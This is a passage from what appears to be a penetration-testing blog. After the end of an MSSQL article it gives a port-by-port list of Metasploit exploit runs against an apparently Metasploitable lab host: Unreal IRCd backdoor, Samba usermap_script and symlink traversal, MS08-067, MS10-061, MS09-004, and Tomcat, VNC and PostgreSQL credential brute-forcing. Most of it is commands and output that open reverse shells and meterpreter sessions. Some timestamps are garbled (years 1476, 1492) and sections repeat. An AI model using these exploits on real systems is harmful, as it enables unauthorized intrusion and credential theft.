  • Privilege that the database server is running
  • Databases that exist
The fact that the xp_cmdshell is enabled means that we can execute commands on the remote system through the SQL Server.Of course the first thing that comes to our minds is to add another account and to put it on the local administrator group in order to have permanent access to the box.Metasploit framework has an appropriate module for this work.Below is a sample of the usage of this module.

// xp_cmdshell – Metasploit

xp_cmdshell - Metasploit
In case that we want to connect to the database directly and to execute SQL commands we can use either a client like osql or another metasploit module the mssql_sql.
 
// Executing Database Commands
Executing Database Commands


With this module we can extract more information about the database tables and records.

Conclusion
The purpose of this article is to provide an overview to the penetration tester about common tools and methods when he has to assess Microsoft SQL servers.It is also very important to know the structure of an SQL server and what we have to look for as a penetration tester so it is recommended to create our own SQL database in our lab in order to understand better how it works and what these modules are doing exactly when interacting with the database. 
 

Here Is The List Of Open Port Exploits ??

// Open Port Exploits

port 6667 - Unreal ircd (win/linux)
port 1524 - ingreslock (linux)
port 8180 - tomcat_mgr_login (win/linux)
port 139 - (linux)
port 139/445 - (linux)

port 445 - (linux)
port 135 - msrpc (win)
port 445 - microsoft-ds (win)
port 1433 - ms-sql-s (win)
port 5900 - vnc (win/linux)
port 5432 - postgresql (linux)
port 25 - smtp
port 3306 - mysql (linux)
port 21 - FTP (linux)


// exploits bellow tested with backtrack 5 
----------------------------------------------------------------------------------

port 6667 - Unreal ircd (win/linux)

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.1.20:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ahaBucJmQvi2ONTC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100

----------------------------------------------------------------------------------

port 1524 - ingreslock (linux)

1524/tcp open ingreslock?

The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@bt# telnet 192.168.1.20 1524
Trying 192.168.1.20...
Connected to 192.168.1.20.
Escape character is '^]'.
root@test:/# id
uid=0(root) gid=0(root) groups=0(root)

----------------------------------------------------------------------------------

port 8180 - tomcat_mgr_login (win/linux)

msf auxiliary(tomcat_mgr_login) > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rport 8180
msf auxiliary(tomcat_mgr_login) > set rhosts Remote-IP-Address
msf auxiliary(tomcat_mgr_login) > run

[*] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - Trying username:'admin' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [01/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - Trying username:'manager' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [02/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - Trying username:'role1' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [03/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - Trying username:'root' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [04/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - Trying username:'tomcat' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [05/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - Trying username:'both' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [06/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - Trying username:'j2deployer' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [07/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - Trying username:'ovwebusr' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [08/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - Trying username:'cxsdk' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [09/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - Trying username:'ADMIN' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [10/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - Trying username:'xampp' with password:''
[-] Remote-IP-Address:8180 TOMCAT_MGR - [11/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - Trying username:'admin' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [12/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - Trying username:'manager' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [13/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - Trying username:'role1' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [14/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - Trying username:'root' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [15/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [16/56] - Trying username:'tomcat' with password:'tomcat'

[+] http://Remote-IP-Address:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'

[*] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - Trying username:'both' with password:'both'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [17/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - Trying username:'j2deployer' with password:'j2deployer'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [18/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [19/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - Trying username:'cxsdk' with password:'cxsdk'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [20/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - Trying username:'ADMIN' with password:'ADMIN'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [21/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - Trying username:'xampp' with password:'xampp'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [22/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [23/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - Trying username:'cxsdk' with password:'kdsxc'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [24/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - Trying username:'root' with password:'owaspbwa'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [25/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - Trying username:'admin' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [26/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - Trying username:'admin' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [27/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - Trying username:'admin' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [28/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - Trying username:'admin' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [29/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - Trying username:'admin' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [30/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - Trying username:'manager' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [31/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - Trying username:'manager' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [32/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - Trying username:'manager' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [33/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - Trying username:'manager' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [34/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - Trying username:'manager' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [35/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - Trying username:'role1' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [36/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - Trying username:'role1' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [37/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - Trying username:'role1' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [38/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - Trying username:'role1' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [39/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - Trying username:'role1' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [40/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - Trying username:'root' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [41/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - Trying username:'root' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [42/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - Trying username:'root' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [43/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - Trying username:'root' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [44/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - Trying username:'root' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [45/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - Trying username:'both' with password:'admin'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [46/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - Trying username:'both' with password:'manager'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [47/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - Trying username:'both' with password:'role1'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [48/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - Trying username:'both' with password:'root'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [49/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - Trying username:'both' with password:'tomcat'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [50/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - Trying username:'both' with password:'s3cret'
[-] Remote-IP-Address:8180 TOMCAT_MGR - [51/56] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

----------------------------------------------------------------------------------


port 139 - (linux)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)

Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address1/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

----------------------------------------------------------------------------------
port 139/445 - (linux)
samba "username map script" command execution

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set rhost Remote-IP-Addres
msf exploit(usermap_script) > set lhost Local-IP-Address
msf exploit(usermap_script) > set rport 139 or 445 (both will work)
msf exploit(usermap_script) > set payload cmd/unix/reverse

msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo AGo0tmuVPzZXPNPw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "AGo0tmuVPzZXPNPw\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Addres:51822) at 2012-10-05 14:35:10 +0100

----------------------------------------------------------------------------------

port 445 - (linux)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)

Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address1/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

----------------------------------------------------------------------------------

port 135 - msrpc (win)

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set lhost IP-Address
msf exploit(ms03_026_dcom) > set rhost IP-Address
msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on IP-Address:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] ...
[*] Sending exploit ...

----------------------------------------------------------------------------------

port 445 - microsoft-ds (win)

use windows/smb/ms08_067_netapi
set rhost 192.168.0.200
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit

[*] Started reverse handler on 192.168.0.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 192.168.0.200
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

Once done you need to open the console by typing the bellow after the >

meterpreter > execute -f cmd.exe -c
Process 1120 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…

Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.


myexploit.wordpress.com/control-smb-445-137-139/

And local printer exploit

msf > use exploit/windows/smb/ms10_061_spoolss

msf exploit(ms10_061_spoolss) > info

Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 13208
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:
jduck
hdm

Available targets:
Id Name
-- ----
0 Windows Universal

Basic options:
Name Current Setting Required Description

---- --------------- -------- -----------
PNAME no The printer share name to use on the target
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service

Payload information:
Space: 1024
Avoid: 0 characters

Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.

References:

http://www.osvdb.org/67988

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729

http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > set rhost Remote-IP-Address

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse handler on Local-IP-Address:4444
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\IP-Address\PWN-AGFA-Acc ...
[*] Printer handle: 000000008493a66b538fa546865d85bb85e8f036
[*] Job started: 0x2
[*] Wrote 73802 bytes to %SystemRoot%\system32\pDeC6njEHgezu5.exe
[*] Job started: 0x3
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\9Y3E56ufs7KWqm.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (752128 bytes) to Remote-IP-Address
[*] Meterpreter session 4 opened (Local-IP-Address:4444 -> Remote-IP-Address:1033) at 1476-12-06 17:24:48 +0000

meterpreter >

----------------------------------------------------------------------------------

port 1433 - ms-sql-s (win)


msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address
lhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address
rhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to IP-Address
[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100

----------------------------------------------------------------------------------

port 5900 - vnc (win/linux)

root@bt:~# nmap -sS -sC -p 5900 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
5900/tcp open vnc
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
MAC Address: 08:00:27:EB:18:CC (Micky Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt
msf auxiliary(vnc_login) > set rhosts IP-Address
msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3
msf auxiliary(vnc_login) > run

[*] IP-Address:5900 - Starting VNC login sweep
[*] IP-Address:5900 VNC - [01/18] - Attempting VNC login with password ''
[*] IP-Address:5900 VNC - [01/18] - , VNC server protocol version : 3.3
[-] IP-Address:5900 VNC - [01/18] - , Authentication failed
[*] IP-Address:5900 VNC - [02/18] - Attempting VNC login with password 'password'
[*] IP-Address:5900 VNC - [02/18] - , VNC server protocol version : 3.3
[+] IP-Address:5900, VNC server password : "password"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

2. Open vncviewer or tsclient


root@bt:~# vncviewer ip-address:5900

root@bt:~# tsclient

Computer = IP-Address
Protocol = VNC
Username = leave blank
Press connect

3. A Password box will open type in password press enter.

port 8180 - tomcat_mgr_login (win/linux)

----------------------------------------------------------------------------------

port 5432 - postgresql (linux)

root@bt:~# nmap -sV -p 22,5432 --open Remote-IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-05 15:46 BST
Nmap scan report for Remote-IP-Address
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

MAC Address: 01:02:03:04:05:06 (Micky Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds

msf > search PostgreSQL

Matching Modules
================

Name Disclosure Date Rank Description

---- --------------- ---- -----------
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload 2009-04-10 00:00:00 UTC excellent PostgreSQL for Microsoft Windows Payload Execution

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts Remote-IP-Address
msf auxiliary(postgres_login) > exploit

[*] Remote-IP-Address:5432 Postgres - [01/21] - Trying username:'postgres' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'postgres':''
[-] Remote-IP-Address:5432 Postgres - [01/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [02/21] - Trying username:'' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':''
[-] Remote-IP-Address:5432 Postgres - [02/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [03/21] - Trying username:'scott' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':''
[-] Remote-IP-Address:5432 Postgres - [03/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [04/21] - Trying username:'admin' with password:'' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':''
[-] Remote-IP-Address:5432 Postgres - [04/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [05/21] - Trying username:'postgres' with password:'postgres' on database 'template1'
[+] Remote-IP-Address:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'

[+] Remote-IP-Address:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)

[*] Remote-IP-Address:5432 Postgres - Disconnected
[*] Remote-IP-Address:5432 Postgres - [06/21] - Trying username:'scott' with password:'scott' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'scott'
[-] Remote-IP-Address:5432 Postgres - [06/21] - Username/Password failed.
[*] Remote-IP-Address:5432 Postgres - [07/21] - Trying username:'admin' with password:'admin' on database 'template1'
[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'admin'
[-] Remote-IP-Address:5432 Postgres - [07/21] - Username/Password failed.
